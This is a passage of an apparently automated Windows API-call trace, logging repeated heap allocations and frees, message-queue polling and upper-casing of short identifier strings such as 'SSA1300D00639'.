1 [0196.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0196.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0196.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0196.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0196.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0196.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0196.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0196.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0196.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0196.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0196.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0196.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0196.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0196.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0196.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0196.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0196.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0196.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0196.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0196.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0196.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0196.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0196.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0196.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0196.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0196.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0196.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0196.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0196.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0196.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0196.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0196.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0196.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0196.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0196.699] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0196.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0196.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0196.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0196.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0196.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0196.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0196.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0196.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0196.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0196.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0196.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0196.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0196.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0196.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0196.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0196.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0196.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0196.700] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0196.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0196.700] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0196.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0196.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0196.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1728 [0196.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0196.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0196.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0196.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0196.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0196.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0196.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0196.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0196.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0196.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0196.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0196.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0196.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0196.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0196.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d80 [0196.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0196.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0196.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0196.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0196.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0196.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0196.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0196.702] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0196.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0196.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0196.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0196.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0196.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0196.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0196.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0196.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0196.702] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0196.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0196.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0196.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0196.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0196.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0196.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0196.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0196.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0196.703] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0196.703] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0196.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0196.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0196.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0196.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0196.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0196.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0196.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0196.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0196.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0196.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0196.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0196.703] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0196.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0196.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0196.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0196.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0196.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0196.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0196.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0196.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0196.704] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0196.704] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0196.704] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0196.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0196.704] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0196.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0196.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8c0 [0196.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0196.704] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0196.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0196.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0196.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0196.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0196.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0196.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0196.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0196.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0196.705] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0196.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0196.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0196.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0196.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0196.705] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.705] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0196.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0196.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0196.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0196.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0196.706] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.706] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0196.706] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0196.706] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0196.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0196.706] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0196.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0196.706] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0196.706] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0196.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0196.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0196.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0196.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0196.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0196.707] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0196.707] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.707] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0196.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0196.707] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0196.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0196.707] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0196.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0196.707] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0196.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0196.707] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0196.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0196.708] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0196.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0196.708] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0196.708] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0196.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0196.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0196.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0196.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0196.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0196.708] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0196.708] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.708] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0196.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0196.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0196.708] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0196.709] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 